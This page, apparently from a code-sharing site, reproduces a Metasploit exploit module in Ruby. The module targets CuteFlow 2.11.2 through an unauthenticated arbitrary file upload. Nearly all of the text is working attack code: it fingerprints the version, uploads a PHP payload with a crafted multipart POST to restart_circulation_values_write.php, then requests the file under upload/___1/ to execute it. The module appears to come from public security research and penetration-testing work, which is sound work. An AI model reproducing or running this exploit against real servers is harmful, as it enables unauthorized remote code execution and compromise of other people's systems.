扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "CuteFlow v2.11.2 Arbitrary File Upload Vulnerability", 'Description'=> %q{ This module exploits a vulnerability in CuteFlow version 2.11.2 or prior. This application has an upload feature that allows an unauthenticated user to upload arbitrary files to the 'upload/___1/' directory and then execute it. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit ], 'References' => [ ['URL', 'http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/'] #['OSVDB', ''], #['EDB', ''], ], 'Payload'=> { 'BadChars' => "\x00" }, 'DefaultOptions'=> { 'ExitFunction' => "none" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets'=> [ ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, 'DisclosureDate' => "Jul 27 2012", 'DefaultTarget'=> 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/cuteflow_v.2.11.2/']) ], self.class) end def check base= target_uri.path base << '/' if base[-1, 1] != '/' res = send_request_raw({ 'method' => 'GET', 'uri'=> "#{base}" }) if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/ return Exploit::CheckCode::Vulnerable elsif res.body =~ /\<a href\=\"http\:\/\/cuteflow\.org" target\=\"\_blank\"\>/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def upload(base, fname, file) # construct post data boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}" data_post= "--#{boundary}\r\n" data_post << "Content-Disposition: form-data; name=\"attachment1\"; filename=\"#{fname}\"\r\n" data_post << "Content-Type: text/php\r\n" data_post << "\r\n" data_post << file data_post << "\r\n" data_post << "--#{boundary}\r\n" # upload res = send_request_cgi({ 'method'=> 'POST', 'uri' => "#{base}pages/restart_circulation_values_write.php", 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data'=> data_post, }) return res end def exploit base= target_uri.path base << '/' if base[-1, 1] != '/' @peer = "#{rhost}:#{rport}" # upload PHP payload to upload/___1/ print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| res = upload(base, fname, php) if res.nil? print_error("#{@peer} - Uploading PHP payload failed") return end # retrieve and execute PHP payload print_status("#{@peer} - Retrieving file: #{fname}") send_request_raw({ 'method' => 'GET', 'uri'=> "#{base}upload/___1/#{fname}" }) handler end end |
体验盒子
